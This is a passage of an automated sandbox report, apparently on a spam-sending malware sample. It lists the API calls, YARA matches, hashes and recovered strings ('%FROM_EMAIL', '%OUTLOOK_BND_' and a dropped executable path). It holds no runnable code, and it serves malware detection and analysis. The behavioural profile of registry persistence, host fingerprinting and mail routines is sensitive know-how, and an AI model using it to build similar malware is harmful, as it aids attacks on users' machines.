                                                                                        • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,02D7E50A,00000000,00000000,00000000,00020106,00000000,02D7E50A,00000000,000000E4), ref: 02D7E319
                                                                                        • RegSetValueExA.ADVAPI32(02D7E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 02D7E38E
                                                                                        • RegDeleteValueA.ADVAPI32(02D7E50A,?,?,?,?,?,000000C8,004122F8), ref: 02D7E3BF
                                                                                        • RegCloseKey.ADVAPI32(02D7E50A,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,02D7E50A), ref: 02D7E3C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseCreateDelete
                                                                                        • String ID:
                                                                                        • API String ID: 2667537340-0
                                                                                        • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                        • Instruction ID: 4fcd0b442a7059266b9ea560e16b926ae48ac10058024c31fe7a48ca7c60aa96
                                                                                        • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                        • Instruction Fuzzy Hash: 6B214A71A0021DBBDF209FA5EC89EEE7F79EF08750F108061F944A6260E3758A54DBA0
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                        • GetLastError.KERNEL32 ref: 00403F4E
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                        • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                        • GetLastError.KERNEL32 ref: 00403FC2
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                        • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D7421F
                                                                                        • GetLastError.KERNEL32 ref: 02D74229
                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 02D7423A
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D7424D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction ID: 957519d7444e056c5d9fe7adb4b2817941e47d7b2f61891bdafde135af04fc56
                                                                                        • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction Fuzzy Hash: 7601E572511109ABDF02DF90ED84BEE7BBCEB18265F008061F901E2550E774DA64CBB6
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D741AB
                                                                                        • GetLastError.KERNEL32 ref: 02D741B5
                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 02D741C6
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D741D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction ID: 96f3bcc638b411f2fe55072ef86f1de212d9ff7ec3f919257dd859acd6ad81ef
                                                                                        • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction Fuzzy Hash: 9E01E97651111AABDF02EF90ED84BEF7B7CEB18256F004065F901E2150E774DA54CBB5
                                                                                        APIs
                                                                                        • lstrcmp.KERNEL32(?,80000009), ref: 02D7E066
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp
                                                                                        • String ID: A$ A$ A
                                                                                        • API String ID: 1534048567-1846390581
                                                                                        • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                        • Instruction ID: 378f8a58fc60ee325b521efbaef5e558f1c7895a4931b3d556d069e3ae1a3b0c
                                                                                        • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                        • Instruction Fuzzy Hash: 20F062312007129BCF20CF25D884A82B7E9FB05325B6486AAE554C3260E378A898CB51
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                        • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                        • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                        • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                        • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                        • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                        • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                        • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                        • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                        • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                        • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                        • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                        • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                        • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                        • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403103
                                                                                        • GetTickCount.KERNEL32 ref: 0040310F
                                                                                        • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                        • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                        • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                        • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 02D783C6
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02D78477
                                                                                          • Part of subcall function 02D769C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 02D769E5
                                                                                          • Part of subcall function 02D769C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 02D76A26
                                                                                          • Part of subcall function 02D769C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 02D76A3A
                                                                                          • Part of subcall function 02D7EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02D71DCF,?), ref: 02D7EEA8
                                                                                          • Part of subcall function 02D7EE95: HeapFree.KERNEL32(00000000), ref: 02D7EEAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 359188348-2650950432
                                                                                        • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                        • Instruction ID: d43a0850e5150f9f2189df6612d5e76cc3b55ab534db2930731230be47917a3d
                                                                                        • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                        • Instruction Fuzzy Hash: C24161B2900118BEEB20EBA49D88EFF777EEB04318F1444B6E504D6210F7B85E54EB65
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 02D7AFFF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 02D7B00D
                                                                                          • Part of subcall function 02D7AF6F: gethostname.WS2_32(?,00000080), ref: 02D7AF83
                                                                                          • Part of subcall function 02D7AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 02D7AFE6
                                                                                          • Part of subcall function 02D7331C: gethostname.WS2_32(?,00000080), ref: 02D7333F
                                                                                          • Part of subcall function 02D7331C: gethostbyname.WS2_32(?), ref: 02D73349
                                                                                          • Part of subcall function 02D7AA0A: inet_ntoa.WS2_32(00000000), ref: 02D7AA10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %OUTLOOK_BND_
                                                                                        • API String ID: 1981676241-3684217054
                                                                                        • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction ID: aee4a52c34e354838655bef00f003ae85a29a052331015432de68c2314d5b28c
                                                                                        • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction Fuzzy Hash: FB41127290020CAFDB25EFA0DC45EEE3BADFF04304F24441AF92592251EA79DA548F64
                                                                                        APIs
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 02D79536
                                                                                        • Sleep.KERNEL32(000001F4), ref: 02D7955D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShellSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4194306370-3916222277
                                                                                        • Opcode ID: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction ID: d7f1449f0e2bd6c081e112542f39ed28010d7ebb7dc75819dd5bc2c6d9a3b0cc
                                                                                        • Opcode Fuzzy Hash: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction Fuzzy Hash: 464109B38083A46EEB368B78D8AD7E67BE59B02318F1801E5D482573A2F77C4D81C711
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                        • WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID: ,k@
                                                                                        • API String ID: 3934441357-1053005162
                                                                                        • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                        • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 02D7B9D9
                                                                                        • InterlockedIncrement.KERNEL32(00413648), ref: 02D7BA3A
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 02D7BA94
                                                                                        • GetTickCount.KERNEL32 ref: 02D7BB79
                                                                                        • GetTickCount.KERNEL32 ref: 02D7BB99
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 02D7BE15
                                                                                        • closesocket.WS2_32(00000000), ref: 02D7BEB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountIncrementInterlockedTick$closesocket
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 1869671989-2903620461
                                                                                        • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction ID: d273ee52ec87788dd0bf24692212b57e5655dd124567419033c9e9e8e033c3db
                                                                                        • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction Fuzzy Hash: C0315C71504248DFDF25DFA4DC84AEDB7A9EB48705F20405AFA25822A0FB79DA85CF14
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 536389180-1857712256
                                                                                        • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                        • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                        APIs
                                                                                        Strings
                                                                                        • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickwsprintf
                                                                                        • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                        • API String ID: 2424974917-1012700906
                                                                                        • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                        • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                        APIs
                                                                                          • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                          • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 3716169038-2903620461
                                                                                        • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                        • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 02D770BC
                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 02D770F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountLookupUser
                                                                                        • String ID: |
                                                                                        • API String ID: 2370142434-2343686810
                                                                                        • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction ID: 1e7b7d7e48e8582de938d5ac85168ac64198426bf637d23b9596522d23fedd3d
                                                                                        • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction Fuzzy Hash: E6111E72A0011CEBEF11CFD4DC84ADEF7BDAB04715F1455A6E901E6294E7749B88CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401BA3
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2777991786-1857712256
                                                                                        • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                        • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                        • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                        APIs
                                                                                        • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                        • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: IncrementInterlockedlstrcpyn
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 224340156-2903620461
                                                                                        • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                        • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                        • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                        APIs
                                                                                        • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                        • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbyaddrinet_ntoa
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 2112563974-1857712256
                                                                                        • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                        • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                        • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(00000001), ref: 00402693
                                                                                        • gethostbyname.WS2_32(00000001), ref: 0040269F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 1594361348-2401304539
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000), ref: 0040EAF2
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ntdll.dll
                                                                                        • API String ID: 2574300362-2227199552
                                                                                        • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                        • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                        • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                        APIs
                                                                                          • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                          • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
